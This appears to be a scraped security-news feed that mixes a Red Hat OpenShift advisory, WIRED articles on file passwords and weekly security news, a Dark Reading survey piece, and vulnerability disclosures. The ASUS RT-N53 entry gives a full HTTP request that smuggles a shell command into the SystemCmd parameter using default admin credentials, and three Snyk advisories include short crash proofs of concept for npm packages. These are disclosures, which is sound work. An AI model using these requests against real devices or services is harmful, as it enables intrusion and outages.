Red Hat Security Advisory 2022-5026-01 - This advisory contains the following OpenShift Virtualization 4.10.2 images: RHEL-8-CNV-4.10. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Virtualization 4.10.2 Images security and bug fix update  
Advisory ID:       RHSA-2022:5026-01  
Product:           cnv  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5026  
Issue date:        2022-06-14  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-21698   
=====================================================================

1. Summary:

Red Hat OpenShift Virtualization release 4.10.2 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This advisory contains the following OpenShift Virtualization 4.10.2  
images:

RHEL-8-CNV-4.10  
===============

virt-artifacts-server-container-v4.10.2-1  
kubevirt-template-validator-container-v4.10.2-1  
virtio-win-container-v4.10.2-1  
node-maintenance-operator-container-v4.10.2-1  
hostpath-provisioner-operator-container-v4.10.2-1  
virt-handler-container-v4.10.2-1  
libguestfs-tools-container-v4.10.2-1  
hostpath-csi-driver-container-v4.10.2-1  
virt-operator-container-v4.10.2-1  
virt-launcher-container-v4.10.2-1  
hostpath-provisioner-container-v4.10.2-1  
virt-api-container-v4.10.2-1  
virt-controller-container-v4.10.2-1  
cnv-must-gather-container-v4.10.2-2  
kubernetes-nmstate-handler-container-v4.10.2-3  
bridge-marker-container-v4.10.2-3  
virt-cdi-uploadproxy-container-v4.10.2-3  
virt-cdi-uploadserver-container-v4.10.2-3  
ovs-cni-marker-container-v4.10.2-3  
virt-cdi-operator-container-v4.10.2-3  
ovs-cni-plugin-container-v4.10.2-3  
kubemacpool-container-v4.10.2-3  
virt-cdi-controller-container-v4.10.2-3  
kubevirt-ssp-operator-container-v4.10.2-4  
cnv-containernetworking-plugins-container-v4.10.2-3  
cluster-network-addons-operator-container-v4.10.2-3  
virt-cdi-apiserver-container-v4.10.2-3  
hyperconverged-cluster-operator-container-v4.10.2-2  
hyperconverged-cluster-webhook-container-v4.10.2-2  
virt-cdi-cloner-container-v4.10.2-3  
virt-cdi-importer-container-v4.10.2-3  
hco-bundle-registry-container-v4.10.2-10

Security Fix(es):

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2016290 - [Warm] Warm Migration Fails and reporting ambiguous status.  
2033346 - [cnv-4.10] Add vm name label to virt-launcher pods  
2037605 - Openshift Virtualization alert 50% of the hyperconverged-cluster-operator-metrics/hyperconverged-cluster-operator-metrics targets in openshift-cnv namespace have been unreachable for more than 15 minutes on port 8686  
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2074384 - SAP HANA template - template should be moved to https://github.com/RHsyseng/cnv-supplemental-templates  
2080453 - [4.10.z] cluster-network-addons-operator deployment's MULTUS_IMAGE is pointing to brew image  
2080918 - Upgrade CNV from 4.10.1 to 4.11 should be blocked if CNV k8s-nmstate is still installed  
2083594 - virtctl guestfs incorrectly assumes image name  
2085459 - smartclone-controller not started and cloned DataVolumes stuck in SnapshotForSmartCloneInProgress  
2086114 - HCO is taking more than 12 minutes to reconcile consolequickstart connect-ext-net-to-vm and customize-a-boot-source  
2086541 - NMO CSV dependency to CNV is failing  
2088476 - [4.10.z] VMSnapshot restore fails to provision volume with size mismatch error  
2088622 - 4.10.2 containers  
2089637 - CNAO is blocking upgrade to 4.11 despite standalone nmstate operator is installed  
2089658 - SSP Reconcile logging improvement when CR resources are changed  
2089661 - [CNV-4.10] HCO Being Unable to Reconcile State

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqkgw9zjgjWX9erEAQgx+Q/8D2hk89x/JBZwDsyIG/MKZv4CSdKzpdEv  
hXrzpPanW2er9kpYXXFtzIXTpE72UHhbcDvDypyYWPTFaf7b1Lh8Xnk2/3EJMBym  
woyeAngh7a8R7bYNQaokpNVUPTk3IifQkh3ZfRQn5O5GRP2sIZe1eOAc5OX05//R  
VzjfKv5KEJlbW/9EYlmXhQUUirhRsAmKKakRWtMxAMjepatjvR1kuJVn6GWBRlWj  
HOKi8oku30sk3SPWs3oBQ4tzPa2eJu9xAohO5wi16WlCcUj8T4V8yQiO5Ej2gEbY  
0jxYZ1KERyLGxOOP5Pfx1ZkcxmOydvRPxAfqqU7tKoiZPRrOropKJwXpQMGDXxnJ  
TnHPP0Y7KaoI8ybC45nY4pYpPimxRl4+o0hzoIEomOdCFpg+e1aNj2sQE/IzUYAT  
nn6b9n5gm3tKNGbgaQu3P+HA2BVIEmZnCGMOknD0ji3yLiVBObri+mSr0TgaQrNt  
vvIsBdfbDfOOI6ZFhl55fAowj0o8UATfBDbh0G/eO5fQ3g3f1Ydk1/jleOaQwZ1U  
usNYXKD2hbfq0Hq4GaI+a/4ZGFSJ1eRUFSdUtWHvX69DBtrDAj4ivCv6AX5jAoWL  
B66g76/nyTqxVT6frlTh2BT5ZC4T8DoICLB+HLlmXSu9sk4fLGGGCkaqq/wTagfE  
KAa582gklnA=  
=C1sU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5026-01

Zyxel firewalls, AP controllers, and APs suffer from buffer overflow, format string, and command injection vulnerabilities.

Zyxel Buffer Overflow / Format String / Command Injection

Put a digital lock on your most important data.

You never know when one of your files might reach someone it wasn't intended to reach—perhaps through an email forward, a USB stick left behind on a desk, or maybe even an unauthorized user accessing your computer.

Should that happen, password protection is all that stands between your data and the people whom you don't want to see it. It's an extra layer of security you can add to your most sensitive files without too much trouble.

How you go about this will depend on the software you're using to create the file in the first place. Some applications have password protection features built in, while in other cases you'll need to lock up your files using a different method.

Microsoft Word, Excel, and PowerPoint

Adding a password to a document in Word.

Microsoft Word via David Nield

In Word, Excel, or PowerPoint for Windows, open the file you want to protect with a password, then select **File** and **Info**. You should see a Protect option at the top of the next list: Click this button, choose **Encrypt with Password**, and type out your password.

Passwords can be up to 15 characters long and are case-sensitive, so double-check what you're typing in. If you forget the password for a document, spreadsheet, or presentation, you won't be able to get back into it—you'll have to start again from scratch.

If you're using Office on macOS, the process is slightly different: Open the **Review** tab in the ribbon menu at the top, then click the **Protect** button to enter a password. (The button will be labeled slightly differently depending on which program you're in.)

Google Docs, Sheets, and Slides

Sharing a document in Google Docs.

Google Docs via David Nield

There's no password protection feature as such in Google Drive, because your files are already protected by a password: The password linked to your Google account that you use to log in and view your documents, spreadsheets, and presentations.

If you choose to share a file from Google Docs, Sheets, or Slides—via the big **Share** button in the top-right corner when you're working on something—you can either invite specific users to see it (via their email addresses) or generate a link that anyone can use.

We'd recommend the former option (inviting individual users) for maximum security. This means they'll need to log in with their own Google account password—another layer of password protection—before being able to view the file you've shared.

Apple Pages, Numbers, and Keynote

Setting a password on a document in Apple Pages.

Apple Pages via David Nield

If it's the Apple office applications that you're using, the process of adding a password couldn't be much easier. With the file open in Pages, Numbers, or Keynote, select **File** and then **Set Password** to choose and apply your password.

The same warning applies as it does with Microsoft Office—if you can't remember your password then you're not going to be able to get back into your document, spreadsheet, or presentation (otherwise hackers would be able to get in as well).

Note the **Open with Touch ID** checkbox on the password dialog. This gives you the option of using a Touch ID–enabled keyboard on macOS to open your own protected files, saving you the trouble of typing out a password each time.

Protecting Other Files

Adding password protection to a folder on Dropbox.

Dropbox via David Nield

We can't cover every application out there in terms of password protection, but if you dig around in the programs that you're using you might find that they offer this form of additional security while saving files.

If not, you've still got a few options. Keeping files in cloud storage lockers (like Google Drive) is one option: The act of sharing files on these services usually requires a username and password to log in, so your files are kept safe in that way.

Sometimes there are extra features. In the case of Dropbox, for example, on the folder-sharing pane on the web, you can click **Settings** and then change **Who has access** to **People with password**—so both a unique URL and a password are required for access.

If you need another option, create a password-protected archive containing the file or files that you need to keep safe. 7-Zip is a free tool for Windows that is able to build password-protected archives, for example.

Should your files be on an external hard drive, you can encrypt the entire drive and add a password to guard against unwanted access: In Windows, right-click on the drive in File Explorer and choose **Turn on BitLocker**; on macOS, go through the Disk Utility.

Third-party applications such as VeraCrypt (free for both Windows and macOS) are also able to encrypt drives for you, adding password protection at the same time. It's a sensible choice if you're putting sensitive data on a portable storage device.

How to Password Protect Any File

Plus: Firefox adds new privacy protections, a big Intel and AMD chip flaw, and more of the week’s top security news.

This week, WIRED revealed new details that link an Indian police force to a hacking campaign against human rights defenders and activists. Researchers at SentinelOne uncovered connections between the city of Pune’s police agency and evidence planted on the devices of activists, as part of a hacking campaign dubbed Modified Elephant. It is alleged that evidence was planted on the computers of activists Rona Wilson and Varvara Rao and then used to arrest the two men. Among other details, an unnamed security analyst at an email provider revealed to SentinelOne and WIRED that the email address and phone number of a Pune police official was set as the recovery email on hacked accounts.

Elsewhere, a new front is emerging in Russia’s war against Ukraine. In the occupied city of Kherson and other nearby regions, Russian forces are routing internet connections from Ukrainian internet service providers to Russian companies. Ukrainian officials tell WIRED the shifts are happening at a large scale and could result in people being subjected to Vladimir Putin’s surveillance and censorship machine.

Robocalls aren’t going away. There’s been progress in tackling the nuisance calls in recent years but the spammy calls are still prevalent. This week we looked into the roots of the problem and what can still be done in the fight against robocalls. We also looked at a new way for cops to collect your fingerprints. How censors in Shanghai haven’t been able to hide stories of the city’s dead during an aggressive Covid-19 lockdown. And the dwindling options facing WikiLeaks founder Julian Assange after the UK Home Office approved his extradition to the US, where he faces espionage and hacking charges.

But that's not all, folks. Each week we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there.

Viktor Muller Ferreira had a traumatic childhood. Growing up, his father and mother—who had adopted him—split up. His mother later died of pneumonia, and his aunt, who raised him, also passed away. The family didn’t have much money. At school, children bullied Ferreira for his looks and his weird accent. As a result, he didn’t have many friends.

One day when his aunt was out, a neighborhood boy came round and told Ferreira that he was the fairy tale character Grey Shadow and he was going to “devour” him. “This scared me so much that I spent the entire day in a small box out on the balcony, praying until my aunt came home.” As he grew older he worked in a garage, took an interest in journalism, and moved to Brazil to reunite with his estranged father and “restore my citizenship.”

Except, according to authorities in the Netherlands, none of that is true.

Dutch intelligence agency AVID claimed this week that “Viktor Muller Ferreira” is just a cover story and false identity for Sergey Vladimirovich Cherkasov, an alleged Russian intelligence officer belonging to the GRU military unit. AVID said it caught Cherkasov applying to be an intern at the International Criminal Court at The Hague, which is investigating potential war crimes in Russia’s wars against Ukraine and Georgia.

As well as stopping Cherkasov from obtaining the position at the ICC and sending him back to Brazil, the Dutch intelligence agency also published his long and detailed cover story. The four-page story, often known as a covert intelligence officer’s “legend,” details the background of the “Ferreira” identity. “The threat posed by this intelligence officer is deemed potentially very high,” AVID said in a statement.

Since outing “Ferreira,” more clues about his undercover life have emerged. Social media profiles belonging to “Ferreira” have been discovered by the investigative unit Bellingcat, as well as a blog and online CV. He also studied at Trinity College Dublin and Johns Hopkins University. Eugene Finkel, an associate professor at Johns Hopkins, who says he taught “Ferreira,” tweeted: “I wrote him a letter. A strong one, in fact. Yes, me. I wrote a reference letter for a GRU officer. I will never get over this fact. I hate everything about GRU, him, this story. I am so glad he was exposed.”

For years it’s been impossible to move backups of WhatsApp chats between Android and iOS, and vice versa. In August last year, WhatsApp announced it was starting to roll out the ability for people to move their data between iPhones and Android devices. Now, this week, the Meta-owned company says backups will work in the other direction too—from Android to iOS.

Processors from Intel and AMD are vulnerable to a new side-channel attack called Hertzbleed. The attack could allow the theft of cryptographic keys and data, as reported by BleepingComputer and DarkReading. Hertzbleed works by exploiting a common power-saving feature in chips—called dynamic frequency scaling (DVFS)—that could allow an attacker to steal data. Frequency changes in DVFS may be correlated with information being processed by chips, Intel says in a blog post. Despite this, neither Intel nor AMD appear to have plans to address the issue. However, the risk to end users seems low at the moment. The team of researchers who found Hertzbleed say ordinary users probably shouldn’t be worried.

Ever since Covid-19 started spreading in early 2020, technological systems have been developed to try to control its spread. In China, a mandatory health code system was created to monitor people’s health status—people with a red code are required to self-isolate, those with a green code are allowed to move freely. These health codes are tied to people’s phones. Now, according to multiple reports, people in the Chinese province of Henan claim their plans to protest have been blocked as their health code has been turned red. Several people impacted claim they have not been around anyone positive with Covid-19 and the change is an abuse of power by officials.

Mozilla’s web browser may have been struggling in recent years, but it is still one of the most privacy-friendly browsers. This week the company said Firefox is turning on its Total Cookie Protection feature by default for everyone using the browser. Any cookies saved to your computer will be available only to the website that placed them there, Mozilla explains in a blog post. “Instead of allowing trackers to link up your behavior on multiple sites, they just get to see behavior on individual sites,” the company says, adding it is “Firefox’s strongest privacy protection to date.”

In November 2021, the US sanctioned notorious Israeli spyware firm NSO Group. The company’s Pegasus hacking tool has been used around the world to spy on journalists and activists. This week it emerged that US defense firm L3Harris is interested in purchasing the technology behind Pegasus, as the _Financial Times_ reports. Any purchase of the technology by a US company would potentially put it at odds with the Biden administration, which blacklisted NSO. Talk of the potential deal, which was said to be in early stages, has prompted criticism from the White House. “We are deeply concerned,” a senior official told the _Washington Post_. They said the deal could cause security and counterintelligence issues for the US.

An Alleged Russian Spy Was Busted Trying to Intern at The Hague

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 10 and June 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for June 10 to June 17

Security teams —  who are already fighting off malware challenges — are also facing renewed attacks on cloud assets and remote systems.

Big picture, security professionals worry about how to defend their organizations against increasingly sophisticated attacks exploiting zero-day vulnerabilities or nation-state attackers, but their day-to-day security concerns appear to be far more prosaic. According to Dark Reading's "The State of Malware Threats" report, ransomware and phishing attacks are top-of-mind for security professionals.

When asked which type of attacks worried them most, 61% of IT security professionals cited ransomware, followed by 54% for phishing attacks. These statistics are significantly higher than last year's survey, where 41% said they were concerned about ransomware and 31% about phishing attacks.

Ransomware attacks are on the rise, and they are increasingly expensive. Even if an organization doesn't paying the ransom, the recovery cost is high, and there is the risk that the attackers might dump sensitive data online. Phishing is also another big concern, as that tactic is used in pretty much every kind of attack to download malware onto user machines or to steal information and credentials.

Even as more employees return to the office in the wake of the COVID-19 pandemic, the changes that two years of remote work wrought on business operations remain intact. Cloud implementation, which was already rising back in 2019, accelerated even more than predicted.

The increased reliance on the cloud may be why 27% of IT security professionals cited attacks on cloud systems and services as most worrisome.

Some threats may be of heightened concern due to highly publicized breaches. The 2019 SolarWinds attack, for one, kicked off what the report calls "a new wave of breach-once-compromise-many attacks via the software supply chain." Add in the July 2021 Kaseya ransomware kerfuffle, and it's easy to see why concern about malware and other compromises triggered by suppliers or other trading partners hit 20% in 2022, compared with 14% in 2021. Incidents such as the Microsoft Exchange Server exploit in March 2021 truly unnerved security professionals: Concerns and vulnerabilities in applications and operating systems more than doubled, from 11% in 2021 to 29% in 2022.

Polymorphic fileless malware was cited as another area of concern for 24% of respondents, up from 14% last year. This type of malware modifies functions and processes without needing to be a standalone file, which makes it difficult to detect. Cross-platform malware such as Hajime (a new category in the survey, which 7% of respondents cited) often targets Internet of Things (IoT) devices, an attack vector whose profile doubled, from 12% in the 2021 survey to 24% in 2022.

Surprisingly, concern about malware that uses artificial intelligence stayed nearly flat, rising only 1% to 18% this year. That's still a well-recognized threat, but it's interesting that fear around it has cooled.

Ransomware and Phishing Remain IT's Biggest Concerns

ASUS RT-N53 3.0.0.4.376.3754 has a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface.

Permalink

Cannot retrieve contributors at this time

There is a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface in RT-N53

**http://ip/apply.cgi**

    
    
    RT-N53 (Version 3.0.0.4.376.3754)
    
    GET /apply.cgi?current_page=Main_WOL_Content.asp&next_page=Main_WOL_Content.asp&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ether-wake+-i+br0+whoami&firmver=3.0.0.4&destIP=ccccc&wollist_deviceName=&wollist_macAddr= HTTP/1.1 
    Host: 192.168.1.1 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.1.1/Main_WOL_Content.asp 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Cookie: clock_type=1; hwaddr=52:54:00:12:34:57; bw_24refresh=1; ymd=2; bw_rtab=WIRELESS1 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31874: uai-poc/command injection.md at main · jayus0821/uai-poc

All versions of package pg-native; all versions of package libpq are vulnerable to Denial of Service (DoS) when the addons attempt to cast the second argument to an array and fail. This happens for every non-array argument passed.

**Note:**
pg-native is a mere binding to npm's libpq library, which in turn has the addons and bindings
to the actual C libpq library. This means that problems found in pg-native  may transitively impact 
npm's libpq.




Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-LIBPQ-2392366
    
*   **published**
    
    14 Jun 2022
    
*   **disclosed**
    
    3 Feb 2022
    
*   **credit**
    
    Cristian-Alexandru Staicu, Snyk Security Labs
    

**How to fix?**

There is no fixed version for libpq.

**Overview**

libpq is a node native bindings to the PostgreSQL libpq C client library.

Affected versions of this package are vulnerable to Denial of Service (DoS) when the addons attempt to cast the second argument to an array and fail. This happens for every non-array argument passed.

**Note:** pg-native is a mere binding to npm's libpq library, which in turn has the addons and bindings to the actual C libpq library. This means that problems found in pg-native may transitively impact npm's libpq.

**PoC**

    //pg-native -> poc.js
    
    let Client = require('pg-native') 
    let client = new Client(); 
    client.connectSync(); 
    client.query('some str', 1, function() {});
    
    //libpq -> poc.js
    
    var Libpq = require('libpq') 
    const pq = new Libpq(); 
    pq.sendQueryParams("some str", 1) 
    

**Details**

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

*   High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
    
*   Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

CVE-2022-25852: Denial of Service (DoS) in libpq | CVE-2022-25852 | Snyk

All versions of package @discordjs/opus are vulnerable to Denial of Service (DoS) when trying to encode using an encoder with zero channels, or a non-initialized buffer. This leads to a hard crash.



Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-DISCORDJSOPUS-2403100
    
*   **published**
    
    16 Jun 2022
    
*   **disclosed**
    
    16 Feb 2022
    
*   **credit**
    
    Cristian-Alexandru Staicu
    

**How to fix?**

There is no fixed version for @discordjs/opus.

**Overview**

@discordjs/opus is a native bindings to libopus.

Affected versions of this package are vulnerable to Denial of Service (DoS) when trying to encode using an encoder with zero channels, or a non-initialized buffer. This leads to a hard crash.

**PoC**

// Zero channels:

    const { OpusEncoder } = require('@discordjs/opus');
     const encoder = new OpusEncoder(48000, 0);
     try {
         const encoded = encoder.encode(Buffer.from("aaa"));
     } catch(e) {
    console.log("This will never run")
         // never executed because of the hard crash
     }
    

// Non-initialized buffer:

    const { OpusEncoder } = require('@discordjs/opus');
    const encoder = new OpusEncoder(48000, 2);
    try {
         const encoded = encoder.encode(null);
    } catch(e) {
    // never executed because of the hard crash
    }
    

**Details**

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

*   High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
    
*   Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

CVE-2022-25345: Denial of Service (DoS) in @discordjs/opus | CVE-2022-25345 | Snyk

All versions of package fast-string-search are vulnerable to Denial of Service (DoS) when computations are incorrect for non-string inputs. One can cause the V8 to attempt reading from non-permitted locations and cause a segmentation fault due to the violation.




Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-FASTSTRINGSEARCH-2392367
    
*   **published**
    
    15 Jun 2022
    
*   **disclosed**
    
    3 Feb 2022
    
*   **credit**
    
    Cristian-Alexandru Staicu
    

**How to fix?**

There is no fixed version for fast-string-search.

**Overview**

fast-string-search is a module that can search substrings in a string by using N-API and boyer-moore-magiclen.

Affected versions of this package are vulnerable to Denial of Service (DoS) when computations are incorrect for non-string inputs. One can cause the V8 to attempt reading from non-permitted locations and cause a segmentation fault due to the violation.

**PoC**

    const fss = require('fast-string-search');
    
    let res1 = fss.indexOfSkip("no way this will", "w");
    let res2 = fss.indexOfSkip(1, 1); 
    
    console.log(res1);
    console.log(res2);
    
    // you can also crash it after a very long useless computation, by running this instead of lines 6-11: 
    let a = new Array(10000)
    let res2 = fss.indexOfSkip(1, 1); // segfaults after 5 seconds
    

**Details**

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

*   High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
    
*   Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Tag

#mac